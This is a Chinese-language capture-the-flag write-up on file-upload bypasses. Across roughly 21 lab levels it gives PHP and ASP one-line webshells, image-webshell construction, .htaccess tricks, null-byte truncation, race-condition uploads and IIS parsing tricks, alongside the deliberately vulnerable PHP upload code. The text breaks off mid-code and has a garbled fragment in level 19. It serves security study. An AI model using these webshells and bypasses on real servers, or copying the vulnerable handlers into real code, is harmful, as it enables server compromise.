文章目录
- 文件上传要点
- 1、前端验证绕过
- 做题步骤
- 源码分析
- 2、Content-Type方式绕过
- 做题步骤
- 源码分析
- 3、黑名单绕过
- 做题步骤
- 源码分析
- 4、.htaccess文件绕过
- 简介
- 做题步骤
- 源码分析
- 5、后缀大小写绕过
- 简介
- 做题步骤
- 源码分析
- 6、文件后缀(空)绕过
- 简介
- 做题步骤
- 源码分析
- 7、文件后缀(点)绕过
- 简介
- 做题步骤
- 源码分析
- 8、::$DATA(Windows文件流绕过)
- 简介
- 做题步骤
- 源码分析
- 9、构造文件后缀绕过
- 做题步骤
- 源码分析
- 10、双写文件后缀绕过
- 做题步骤
- 源码分析
- 11、%00截断绕过
- 简介
- 做题步骤
- 源码分析
- 12、%00截断绕过(二)
- 做题步骤
- 源码分析
- 13-15、图片马绕过
- 做题步骤
- 源码分析
- 16、二次渲染绕过
- 简介
- 做题步骤
- 源码分析
- 17-18、条件竞争绕过
- 简介
- 做题步骤
- 源码分析
- 19、move_uploaded_file()截断
- 做题步骤
- 源码分析
- 20、IIS6.0解析漏洞(一)
- 做题步骤
- 源码分析
- 21、IIS6.0解析漏洞(二)
- 做题步骤
- 源码分析
- 22、IIS6.0解析漏洞(三)
- 做题步骤
- 源码分析
- 23、CGI解析漏洞
- 做题步骤
- 源码分析
文件上传要点
-
成因:没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。
-
分类:
-
客户端检测:一般是在网页上写一段Js脚本,用Js去检测,校验上传文件的后缀名,有白名单也有黑名单。
判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包,所以可以通过抓包来 判断,如果弹出不准上传,但是没有抓到数据包,那么就是前端验证前端验证非常不可靠,传正常文件改数据包就可以绕过,甚至关闭JS都可以尝试绕过
-
服务端检测 常见的手段:
检查Content-Type (内容类型)
检查后缀 (检查后缀是主流)
检查文件头
-
-
asp是一句话木马:
<%eval request("asp")%> -
php一句话木马:
<?php eval($_REQUEST[1]);?> -
图片马制作:cmd
copy 1.jpg/b + 1.php/a 2.jpg -
防御:
-
防护怎么加?(文件上传默认代码是没有防护的。)
客户端检测:浏览器(JS) => 没有检测
服务端检测:目标主机(后端代码) -
黑名单:不允许某某
白名单:只允许某某 -
防御方式:
后缀检测(最常见检测方式) 根据后缀来决定用什么东西处理这个文件
Content-Type:
.php => phtml php3 php4 php5
.htaccess => 分布式配置文件
windows 的文件和文件夹都不分大小写的
windows 会自动去后缀末尾的空格
windows 会自动去后缀末尾的点
.php .php空格 => 末尾的空格会处理
-
1、前端验证绕过
文件名后缀设为php,文件类型设为图片类型
做题步骤
先上传一个php文件和正常的图片文件看一下回显
正确回显:
上传php文件回显:
弹窗提示,只能上传.jpg|.png|.gif类型的文件
构造图片马:<?php eval($_POST[1]); ?>
抓包修改文件名后缀为php
上传后右键新建标签页打开图像
可以看到文件路径,然后测试是否上传成功
连接蚁剑
拿到flag:zkaq{PpsG@-cImaU2cahL}
源码分析
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
//当文件为空时,提示选择文件
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
//截取到文件后缀名
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
getElementsBy() 方法可以返回指定名称的对象的集合。
substring(起始索引,结束索引) 返回字符串的子字符串。
lastIndexOf() 方法可返回一个指定的字符串值最后出现的位置,在一个字符串中的指定位置从后向前搜索。
2、Content-Type方式绕过
做题步骤
拿到flag:zkaq{2jzVjQeRV_EfuA-+}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';
}
}
($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif'):说明上传的文件类型必须是jpeg、pbg、gif,就是数据包中的Content-Type
3、黑名单绕过
在过滤php,asp等后缀名时,可修改文件后缀名为phtml、php3、php4、php5进行绕过
做题步骤
按照前几关的步骤,上传gif图片马然后修改后缀名为PHP,有以下提示
不允许上传.asp,.aspx,.php,.jsp后缀文件!
尝试绕过,修改文件后缀名为phtml、php3、php4、php5
判断是否上传成功
蚁剑连接
拿到flag:zkaq{lapc=@Hs1EXxqwif}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
4、.htaccess文件绕过
简介
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有禁用.htaccee那么就能触发getshell
.htaccess可以把.jpg解析成php:
AddType application/x-httpd-php .jpg
做题步骤
先上传.htaccess文件:AddType application/x-httpd-php .gif
然后上传gif图片马
测试是否上传成功
蚁剑连接
拿到flag:zkaq{lgevqWqnexX2hy-a}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
代码把很多文件类型都过滤掉了
5、后缀大小写绕过
简介
strtolower($file_ext):函数会将所有字母转换为小写,在没有此功能,且很多后缀被ban的情况下,可以使用大小写绕过
做题步骤
上传gif图片马
抓包,修改后缀为Php
测试是否上传成功
连接蚁剑
拿到flag:zkaq{HBkYvhSTYnXLkY@1}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
这个题把几乎用得到的后缀名都过滤了,包括上一关利用的.htaccess文件,但是没有使用转换小写字母的函数,所以可以绕过
6、文件后缀(空)绕过
简介
trim($file_ext):该函数将字符串收尾去空,
在大小写绕不过,且没有使用此函数时,可使用后缀空绕过
做题步骤
上传gif图片马
抓包在后缀加个空格上传
测试是否上传成功
连接蚁剑
拿到flag:zkaq{fTHte#S@+5n1B+UF}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
$file_ext = strtolower($file_ext);这行代码过滤了大小写
7、文件后缀(点)绕过
简介
deldot($file_name)此函数删除了文件名末尾的点
做题步骤
上传gif图片马
抓包在后缀加几个点上传
拿到flag:zkaq{2hd2JY3@F7VNMY8W}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
$file_ext = trim($file_ext); //首尾去空:此行代码过滤了空格
8、::$DATA(Windows文件流绕过)
简介
str_ireplace('::$DATA', '', $file_ext);:去除字符串::$DATA
做题步骤
回显404
删除::$DATA
蚁剑连接
拿到flag:zkaq{n5zP@kZia7%dSPP1}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
这两行代码过滤了点
但是少掉了过滤字符串::$DATA
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
9、构造文件后缀绕过
做题步骤
抓包修改后缀为php. . .
连接蚁剑
拿到flag:zkaq{1+U=Tl=%AKS-juZ5}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
可以构造后缀有多个空格和点来绕过
10、双写文件后缀绕过
做题步骤
抓包修改后缀名为pphphp
蚁剑连接
拿到flag:zkaq{7aYaRs8IN+9pP=rx}
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) {
$img_path = $UPLOAD_ADDR . '/' .$file_name;
$is_upload = true;
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
$file_name = str_ireplace($deny_ext,"", $file_name);:此行代码表示当匹配到以上文件后缀时,用空格代替
11、%00截断绕过
简介
在url中%00表示ascll码中的0 ,0x00是十六进制表示方法,也是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
做题步骤
抓包修改文件后缀,.php%00.gif,修改参数save_path=../upload/1.php%00
蚁剑连接
拿到flag:zkaq{E9JvKGkwMNLDpZRm}
源码分析
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
}
else{
$msg = '上传失败!';
}
}
else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1)检测后缀时被截断
12、%00截断绕过(二)
做题步骤
与第十一关不同的地方是,本关是post传参
抓包八宝村路径改成1.phpa
然后徐修改hex值,把a对应的地方修改为00
连接蚁剑
拿到flag:zkaq{hx5JQH@+OkI_5Fiv}
源码分析
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
}
else{
$msg = "上传失败";
}
}
else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
13-15、图片马绕过
做题步骤
jpg图片马制作过程:
抓包改后缀名为php
png图片马制作:
gif文件也类似
源码分析
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
}
else{
$msg = "上传失败";
}
}
}
与第十四关、getimagesize图片类型绕过和第十五关、php_exif模块图片类型绕过步骤一样
16、二次渲染绕过
简介
原理:将一个正常显示的图片,上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分,将Webshell代码插在该部分,然后上传。具体实现需要自己编写Python程序,人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。
png:
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
使用gif格式的图片,一般hex前面首部部分不会改变,所以将一句话木马直接插入到没有改变的这部分
做题步骤
制作gif图片马
上传图片,下载下来后木马被删除,对比原来的图片马,在没有变化的位置添加一句话木马
继续上传,上传成功
连接蚁剑
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=$UPLOAD_ADDR.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
$newimagepath = $UPLOAD_ADDR.$newfilename;
imagejpeg($im,$newimagepath);
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = $UPLOAD_ADDR.$newfilename;
unlink($target_path);
$is_upload = true;
}
}
else
{
$msg = "上传失败!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
$newimagepath = $UPLOAD_ADDR.$newfilename;
imagepng($im,$newimagepath);
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = $UPLOAD_ADDR.$newfilename;
unlink($target_path);
$is_upload = true;
}
}
else
{
$msg = "上传失败!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
$newimagepath = $UPLOAD_ADDR.$newfilename;
imagegif($im,$newimagepath);
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = $UPLOAD_ADDR.$newfilename;
unlink($target_path);
$is_upload = true;
}
}
else
{
$msg = "上传失败!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
$im = imagecreatefrompng($target_path);:会使用上传的图片生成新的图片,此时会删除最后末尾的一句话木马
17-18、条件竞争绕过
简介
不断地上传文件和不断地访问自己上传的文件,很有可能在文件进行判断删除之前,成功访问文件,并执行里面的代码
做题步骤
上传shell
<?php
$f=fopen("shell.php","w");
fputs($f,'<?php phpinfo(); ?>');
?>
抓包使用intruder模块,不断上传文件
使用以下脚本访问shell.php文件
源码分析
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = $UPLOAD_ADDR . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传失败!';
}
}
只允许上传.jpg|.png|.gif类型文件
strrpos($file_name,"."):寻找点最后一次出现的时间
$file_ext = substr($file_name,strrpos($file_name,".")+1);:输出后缀名
if(move_uploaded_file($temp_file, $upload_file)){ if(in_array($file_ext,$ext_arr)){这里先把文件移到到upload文件夹,再进行判断后缀名,如果后缀名不对就删除文件。
第十八关与第十七关一样
//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
require_once("./myupload.php");
$imgFileName =time();
$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload($UPLOAD_ADDR);
switch ($status_code) {
case 1:
$is_upload = true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
break;
case 2:
$msg = '文件已经被上传,但没有重命名。';
break;
case -1:
$msg = '这个文件不能上传到服务器的临时文件存储目录。';
break;
case -2:
$msg = '上传失败,上传目录不可写。';
break;
case -3:
$msg = '上传失败,无法上传该类型文件。';
break;
case -4:
$msg = '上传失败,上传的文件过大。';
break;
case -5:
$msg = '上传失败,服务器已经存在相同名称文件。';
break;
case -6:
$msg = '文件无法上传,文件不能复制到目标目录。';
break;
default:
$msg = '未知错误!';
break;
}
}
//myupload.php
class MyUpload{
......
......
......
var $cls_arr_ext_accepted = array(
".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
".html", ".xml", ".tiff", ".jpeg", ".png" );
......
......
......
/** upload()
**
** Method to upload the file.
** This is the only method to call outside the class.
** @para String name of directory we upload to
** @returns void
**/
function upload( $dir ){
$ret = $this->isUploadedFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->setDir( $dir );
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkExtension();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkSize();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// if flag to check if the file exists is set to 1
if( $this->cls_file_exists == 1 ){
$ret = $this->checkFileExists();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, we are ready to move the file to destination
$ret = $this->move();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// check if we need to rename the file
if( $this->cls_rename_file == 1 ){
$ret = $this->renameFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, everything worked as planned :)
return $this->resultUpload( "SUCCESS" );
}
......
......
......
};
19、move_uploaded_file()截断
做题步骤
抓包修改文件名
hex00截断
打开图片链接
修改url路径
注入成功
连接蚁剑
源码分析
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$img_path = $UPLOAD_ADDR . '/' .$file_name;
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) {
$is_upload = true;
}else{
$msg = '上传失败!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);:输出后缀
move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path):函数把上传的文件
F
I
L
E
S
移动到新位置
_FILES移动到新位置
FILES移动到新位置img_path。
20、IIS6.0解析漏洞(一)
做题步骤
抓包,改文件后缀
返回文件位置:
源码分析
$allowedExts = array("gif", "jpeg", "jpg", "png","asa","cer","cdx");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800) // 小于 200 kb
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "错误:: " . $_FILES["file"]["error"] . "";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "";
echo "文件类型: " . $_FILES["file"]["type"] . "";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
if (file_exists("./a/image/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "./a/image/" . $_FILES["file"]["name"];
}
}
}
else
{
echo "非法的文件格式";
}
21、IIS6.0解析漏洞(二)
文件名漏洞:触发漏洞的命名方式:as.asp;.jpg
做题步骤
抓包修改后缀为.asp;.png进行截断
源码分析
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800) // 小于 200 kb
